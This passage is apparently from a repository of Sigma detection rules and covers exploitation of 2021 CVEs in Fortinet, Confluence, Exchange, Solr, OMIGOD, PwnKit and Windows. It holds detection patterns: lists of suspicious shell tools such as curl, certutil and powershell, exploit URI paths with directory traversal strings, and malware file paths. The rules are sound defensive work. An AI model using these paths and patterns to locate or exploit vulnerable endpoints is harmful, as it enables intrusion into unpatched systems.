    "content": "title: Fortinet CVE-2021-22123 Exploitation\nid: f425637f-891c-4191-a6c4-3bb1b70513b4\nstatus: test\ndescription: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs\nreferences:\n    - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection\nauthor: Bhabesh Raj, Florian Roth\ndate: 2021-08-19\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-22123\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '/api/v2.0/user/remoteserver.saml'\n        cs-method: POST\n    filter1:\n        cs-referer|contains: '/root/user/remote-user/saml-user/'\n    filter2:\n        cs-referer: null\n    condition: selection and not filter1 and not filter2\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-22893/web_cve_2021_22893_pulse_secure_rce_exploit.yml",
    "content": "title: Pulse Connect Secure RCE Attack CVE-2021-22893\nid: 5525edac-f599-4bfd-b926-3fa69860e766\nstatus: stable\ndescription: This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html\n    - https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784\nauthor: Sittikorn S\ndate: 2021-06-29\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-22893\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection1:\n        cs-uri-query|contains:\n            - '/dana-na/auth/'\n            - '/dana-ws/'\n            - '/dana-cached/'\n    selection2:\n        cs-uri-query|contains:\n            - '?id='\n            - '?token='\n            - 'Secid_canceltoken.cgi'\n            - 'CGI::param'\n            - 'meeting'\n            - 'smb'\n            - 'namedusers'\n            - 'metric'\n    condition: all of selection*\nfalsepositives:\n    - Vulnerability Scanning\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml",
    "content": "title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt\nid: 245f92e3-c4da-45f1-9070-bc552e06db11\nstatus: test\ndescription: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084\nreferences:\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-26084\n    - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n    - https://github.com/h3v0x/CVE-2021-26084_Confluence\nauthor: Bhabesh Raj\ndate: 2021-09-08\nmodified: 2023-02-13\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.t1190\n    - attack.t1059\n    - cve.2021-26084\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Monitor suspicious child processes spawned by Confluence\n        ParentImage|endswith: '\\Atlassian\\Confluence\\jre\\bin\\java.exe'\n        CommandLine|contains:\n            - 'certutil'\n            - 'cmd /c'\n            - 'cmd /k'\n            - 'cscript'\n            - 'curl'\n            - 'ipconfig'\n            - 'powershell'\n            - 'pwsh'\n            - 'regsvr32'\n            - 'rundll32'\n            - 'whoami'\n            - 'wscript'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-26084/web_cve_2021_26084_confluence_rce_exploit.yml",
    "content": "title: Potential CVE-2021-26084 Exploitation Attempt\nid: 38825179-3c78-4fed-b222-2e2166b926b1\nstatus: test\ndescription: Detects potential exploitation of CVE-2021-260841 a Confluence RCE using OGNL injection\nreferences:\n    - https://github.com/TesterCC/exp_poc_library/blob/be61622600ec79d8fba2fa5f816a870715f0cb3b/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md\n    - https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md\n    - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n    - https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/\nauthor: Sittikorn S, Nuttakorn T\ndate: 2022-12-13\nmodified: 2023-03-24\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-26084\n    - detection.emerging-threats\nlogsource:\n    category: webserver\n    definition: 'Requirements: The POST request body data must be collected in order to make use of certain parts of this detection'\ndetection:\n    selection_main:\n        cs-method: 'POST'\n        sc-status: 200\n        cs-username: 'anonymous' # This string is used to reduce possible FP you could remove it to get authenticated attempts\n    selection_exploit_1:\n        cs-uri-query|contains|all:\n            - '/pages/createpage-entervariables.action'\n            - 'SpaceKey=x' # This URI assume that you can't have a space ID of \"X\"\n    selection_exploit_2_uri:\n        cs-uri-query|contains: '/doenterpagevariables.action'\n    selection_exploit_2_keyword:\n        - 'u0027' # This string should appear in the post body as a value of the parameter \"queryString\"\n    condition: selection_main and (selection_exploit_1 or all of selection_exploit_2_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-26814/web_cve_2021_26814_wzuh_rce.yml",
    "content": "title: Exploitation of CVE-2021-26814 in Wazuh\nid: b9888738-29ed-4c54-96a4-f38c57b84bb3\nstatus: test\ndescription: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814\nreferences:\n    - https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-22\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-21978\n    - cve.2021-26814\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '/manager/files?path=etc/lists/../../../../..'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml",
    "content": "title: Potential CVE-2021-26857 Exploitation Attempt\nid: cd479ccc-d8f0-4c66-ba7d-e06286f3f887\nstatus: stable\ndescription: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service\nreferences:\n    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\nauthor: Bhabesh Raj\ndate: 2021-03-03\nmodified: 2023-02-07\ntags:\n    - attack.t1203\n    - attack.execution\n    - cve.2021-26857\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\UMWorkerProcess.exe'\n    filter:\n        Image|endswith:\n            - 'wermgr.exe'\n            - 'WerFault.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-26858/file_event_win_cve_2021_26858_msexchange.yml",
    "content": "title: CVE-2021-26858 Exchange Exploitation\nid: b06335b3-55ac-4b41-937e-16b7f5d57dfd\nstatus: test\ndescription: |\n    Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for\n    creation of non-standard files on disk by Exchange Server’s Unified Messaging service\n    which could indicate dropping web shells or other malicious content\nreferences:\n    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\nauthor: Bhabesh Raj\ndate: 2021-03-03\nmodified: 2022-10-09\ntags:\n    - attack.t1203\n    - attack.execution\n    - cve.2021-26858\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: 'UMWorkerProcess.exe'\n    filter:\n        TargetFilename|endswith:\n            - 'CacheCleanup.bin'\n            - '.txt'\n            - '.LOG'\n            - '.cfg'\n            - 'cleanup.bin'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-26858/web_cve_2021_26858_iis_rce.yml",
    "content": "title: ProxyLogon Reset Virtual Directories Based On IIS Log\nid: effee1f6-a932-4297-a81f-acb44064fa3a\nstatus: test\ndescription: When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories\nreferences:\n    - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c\nauthor: frack113\ndate: 2021-08-10\nmodified: 2023-05-08\ntags:\n    - cve.2021-26858\n    - detection.emerging-threats\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\n    definition: 'Requirements: The POST request body data must be collected in order to make use of this detection'\ndetection:\n    selection:\n        cs-method: 'POST'\n        sc-status: 200\n        cs-uri-stem: '/ecp/DDI/DDIService.svc/SetObject'\n        cs-uri-query|contains|all:\n            - 'schema=Reset'\n            - 'VirtualDirectory'\n        cs-username|endswith: '$'\n    keywords:\n        '|all':\n            - 'POST'\n            - 200\n            - '/ecp/DDI/DDIService.svc/SetObject'\n            - 'schema=Reset'\n            - 'VirtualDirectory'\n            - '$'\n    condition: selection or keywords\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-27905/web_cve_2021_27905_apache_solr_exploit.yml",
    "content": "title: Potential CVE-2021-27905 Exploitation Attempt\nid: 0bbcd74b-0596-41a4-94a0-4e88a76ffdb3\nstatus: test\ndescription: Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.\nreferences:\n    - https://twitter.com/Al1ex4/status/1382981479727128580\n    - https://twitter.com/sec715/status/1373472323538362371\n    - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/\n    - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186\n    - https://github.com/murataydemir/CVE-2021-27905\nauthor: '@gott_cyber'\ndate: 2022-12-11\nmodified: 2023-03-24\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-27905\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_request1:\n        cs-uri-query|contains|all:\n            - '/solr/'\n            - '/debug/dump?'\n            - 'param=ContentStream'\n        sc-status: 200\n    selection_request2:\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - '/solr/'\n            - 'command=fetchindex'\n            - 'masterUrl='\n        sc-status: 200\n    condition: 1 of selection_*\nfalsepositives:\n    - Vulnerability Scanners\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-28480/web_cve_2021_28480_exchange_exploit.yml",
    "content": "title: Exchange Exploitation CVE-2021-28480\nid: a2a9d722-0acb-4096-bccc-daaf91a5037b\nstatus: test\ndescription: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480\nreferences:\n    - https://twitter.com/GossiTheDog/status/1392965209132871683?s=20\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-14\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-28480\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '/owa/calendar/a'\n        cs-method: 'POST'\n    filter_main_status:\n        sc-status: 503\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-33766/web_cve_2021_33766_msexchange_proxytoken.yml",
    "content": "title: CVE-2021-33766 Exchange ProxyToken Exploitation\nid: 56973b50-3382-4b56-bdf5-f51a3183797a\nstatus: test\ndescription: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766\nreferences:\n    - https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server\nauthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-33766\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_1:\n        cs-method: 'POST'\n        cs-uri-query|contains|all:\n            - '/ecp/'\n            - '/RulesEditor/InboxRules.svc/NewObject'\n        sc-status: 500\n    selection_2:\n        cs-uri-query|contains|all:\n            - 'SecurityToken='\n            - '/ecp/'\n        sc-status: 500\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-33771/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml",
    "content": "title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum\nid: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef\nstatus: test\ndescription: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum\nreferences:\n    - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\n    - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/\nauthor: Sittikorn S\ndate: 2021-07-16\nmodified: 2022-10-09\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.credential-access\n    - attack.t1566\n    - attack.t1203\n    - cve.2021-33771\n    - cve.2021-31979\n    - detection.emerging-threats\n    # - threat_group.Sourgum\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - 'C:\\Windows\\system32\\physmem.sys'\n            - 'C:\\Windows\\System32\\IME\\IMEJP\\imjpueact.dll'\n            - 'C:\\Windows\\system32\\ime\\IMETC\\IMTCPROT.DLL'\n            - 'C:\\Windows\\system32\\ime\\SHARED\\imecpmeid.dll'\n            - 'C:\\Windows\\system32\\config\\spp\\ServiceState\\Recovery\\pac.dat'\n            - 'C:\\Windows\\system32\\config\\cy-GB\\Setup\\SKB\\InputMethod\\TupTask.dat'\n            - 'C:\\Windows\\system32\\config\\config\\startwus.dat'\n            - 'C:\\Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini'\n            - 'C:\\Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini'\n            - 'C:\\Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-33771/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml",
    "content": "title: CVE-2021-31979 CVE-2021-33771 Exploits\nid: 32b5db62-cb5f-4266-9639-0fa48376ac00\nstatus: test\ndescription: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum\nreferences:\n    - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\n    - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/\nauthor: Sittikorn S, frack113\ndate: 2021-07-16\nmodified: 2023-08-17\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.credential-access\n    - attack.t1566\n    - attack.t1203\n    - cve.2021-33771\n    - cve.2021-31979\n    - detection.emerging-threats\n    # - threat_group.Sourgum\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith:\n            - CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)\n            - CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InProcServer32\\(Default)\n    filter:\n        Details|endswith:\n            - system32\\wbem\\wmiutils.dll\n            - system32\\wbem\\wbemsvc.dll\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml",
    "content": "title: Serv-U Exploitation CVE-2021-35211 by DEV-0322\nid: 75578840-9526-4b2a-9462-af469a45e767\nstatus: test\ndescription: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322\nreferences:\n    - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-14\nmodified: 2022-12-18\ntags:\n    - attack.persistence\n    - attack.t1136.001\n    - cve.2021-35211\n    - detection.emerging-threats\n    # - threat_group.DEV-0322\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_whoami:\n        CommandLine|contains: 'whoami'\n    selection_cmd_1:\n        CommandLine|contains:\n            - './Client/Common/'\n            - '.\\Client\\Common\\'\n    selection_cmd_2:\n        CommandLine|contains: 'C:\\Windows\\Temp\\Serv-U.bat'\n    condition: selection_whoami and 1 of selection_cmd*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-38647/zeek_http_exploit_cve_2021_38647_omigod_no_auth_rce.yml",
    "content": "title: OMIGOD HTTP No Authentication RCE - CVE-2021-38647\nid: ab6b1a39-a9ee-4ab4-b075-e83acf6e346b\nstatus: stable\ndescription: |\n    Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.\n    Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\n    Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\nreferences:\n    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n    - https://twitter.com/neu5ron/status/1438987292971053057?s=20\nauthor: Nate Guagenti (neu5ron)\ndate: 2021-09-20\nmodified: 2025-11-03\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1068\n    - attack.t1190\n    - attack.t1203\n    - attack.t1021.006\n    - attack.t1210\n    - detection.emerging-threats\n    - cve.2021-38647\nlogsource:\n    product: zeek\n    service: http\n    definition: Enable the builtin Zeek script that logs all HTTP header names by adding \"@load policy/protocols/http/header-names\" to your local.zeek config file. The script can be seen here for reference https://github.com/zeek/zeek/blob/d957f883df242ef159cfd846884e673addeea7a5/scripts/policy/protocols/http/header-names.zeek\ndetection:\n    selection:\n        status_code: 200\n        uri: /wsman\n        method: POST\n    auth_header:\n        client_header_names|contains: 'AUTHORIZATION'\n    too_small_http_client_body:\n        request_body_len: 0\n    # winrm_ports:\n    #    id.resp_p:\n    #        -  5985\n    #        -  5986\n    #        -  1270\n    condition: selection and not auth_header and not too_small_http_client_body\n    # condition: selection and winrm_ports and not auth_header and not too_small_http_client_body # Enable this to only perform search on default WinRM ports, however those ports are sometimes changed and therefore this is disabled by default to give a broader coverage of this rule\nfalsepositives:\n    - Exploits that were attempted but unsuccessful.\n    - Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips.\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-4034/lnx_auth_exploit_cve_2021_4034_pwnkit_lpe.yml",
    "content": "title: PwnKit Local Privilege Escalation\nid: 0506a799-698b-43b4-85a1-ac4c84c720e9\nstatus: test\ndescription: Detects potential PwnKit exploitation CVE-2021-4034 in auth logs\nreferences:\n    - https://twitter.com/wdormann/status/1486161836961579020\nauthor: Sreeman\ndate: 2022-01-26\nmodified: 2024-09-11\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.001\n    - detection.emerging-threats\n    - cve.2021-4034\nlogsource:\n    product: linux\n    service: auth\ndetection:\n    keywords:\n        '|all':\n            - 'pkexec'\n            - 'The value for environment variable XAUTHORITY contains suspicious content'\n            - '[USER=root] [TTY=/dev/pts/0]'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-40444/file_event_win_exploit_cve_2021_40444.yml",
    "content": "title: Suspicious Word Cab File Write CVE-2021-40444\nid: 60c0a111-787a-4e8a-9262-ee485f3ef9d5\nstatus: test\ndescription: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444\nreferences:\n    - https://twitter.com/RonnyTNL/status/1436334640617373699?s=20\n    - https://twitter.com/vanitasnk/status/1437329511142420483?s=21\nauthor: Florian Roth (Nextron Systems), Sittikorn S\ndate: 2021-09-10\nmodified: 2023-06-22\ntags:\n    - attack.resource-development\n    - attack.t1587\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_cab:\n        Image|endswith: '\\winword.exe'\n        TargetFilename|contains: '\\Windows\\INetCache'\n        TargetFilename|endswith: '.cab'\n    selection_inf:\n        Image|endswith: '\\winword.exe'\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - '.inf'\n    filter_main_legit:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: 'AppData\\Local\\Temp'\n        TargetFilename|endswith: '\\Content.inf'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml",
    "content": "title: Potential CVE-2021-40444 Exploitation Attempt\nid: 894397c6-da03-425c-a589-3d09e7d1f750\nstatus: test\ndescription: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444\n    - https://twitter.com/neonprimetime/status/1435584010202255375\n    - https://www.joesandbox.com/analysis/476188/1/iochtml\nauthor: Florian Roth (Nextron Systems), @neonprimetime\ndate: 2021-09-08\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.t1059\n    - cve.2021-40444\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\control.exe'\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\powerpnt.exe'\n            - '\\excel.exe'\n    filter:\n        CommandLine|endswith:\n            - '\\control.exe input.dll'\n            - '\\control.exe\" input.dll'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml",
    "content": "title: Potential Exploitation Attempt From Office Application\nid: 868955d9-697e-45d4-a3da-360cefd7c216\nstatus: test\ndescription: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)\nreferences:\n    - https://twitter.com/sbousseaden/status/1531653369546301440\n    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190\nauthor: Christian Burkard (Nextron Systems), @SBousseaden (idea)\ndate: 2022-06-02\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - cve.2021-40444\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n            - '\\msaccess.exe'\n            - '\\mspub.exe'\n            - '\\eqnedt32.exe'\n            - '\\visio.exe'\n        CommandLine|contains:\n            - '../../../..'\n            - '..\\..\\..\\..'\n            - '..//..//..//..'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-40539/web_cve_2021_40539_adselfservice.yml",
    "content": "title: ADSelfService Exploitation\nid: 6702b13c-e421-44cc-ab33-42cc25570f11\nstatus: test\ndescription: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539\nreferences:\n    - https://us-cert.cisa.gov/ncas/alerts/aa21-259a\nauthor: Tobias Michalski (Nextron Systems), Max Altgelt (Nextron Systems)\ndate: 2021-09-20\nmodified: 2023-01-02\ntags:\n    - cve.2021-40539\n    - detection.emerging-threats\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '/help/admin-guide/Reports/ReportGenerate.jsp'\n            - '/ServletApi/../RestApi/LogonCustomization'\n            - '/ServletApi/../RestAPI/Connection'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-40539/web_cve_2021_40539_manageengine_adselfservice_exploit.yml",
    "content": "title: CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit\nid: fcbb4a77-f368-4945-b046-4499a1da69d1\nstatus: test\ndescription: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).\nreferences:\n    - https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/\n    - https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html\n    - https://us-cert.cisa.gov/ncas/alerts/aa21-259a\nauthor: Sittikorn S, Nuttakorn Tungpoonsup\ndate: 2021-09-10\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1505.003\n    - cve.2021-40539\n    - detection.emerging-threats\nlogsource:\n    category: webserver\n    definition: 'Must be collect log from \\ManageEngine\\ADSelfService Plus\\logs'\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '/help/admin-guide/Reports/ReportGenerate.jsp'\n            - '/RestAPI/LogonCustomization'\n            - '/RestAPI/Connection'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml",
    "content": "title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event\nid: 3be82d5d-09fe-4d6a-a275-0d40d234d324\nstatus: test\ndescription: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file\nreferences:\n    - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver\n    - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-22\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msiexec.exe'\n        TargetFilename|startswith: 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application'\n        TargetFilename|endswith: '\\elevation_service.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\n    - Possibly some Microsoft Edge upgrades\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml",
    "content": "title: Potential CVE-2021-41379 Exploitation Attempt\nid: af8bbce4-f751-46b4-8d91-82a33a736f61\nstatus: test\ndescription: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights\nreferences:\n    - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver\n    - https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/\n    - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/\n    - https://www.logpoint.com/en/blog/detecting-privilege-escalation-zero-day-cve-2021-41379/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-22\nmodified: 2024-12-01\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - cve.2021-41379\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_parent:\n        ParentImage|endswith: '\\elevation_service.exe'\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384' # System\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml",
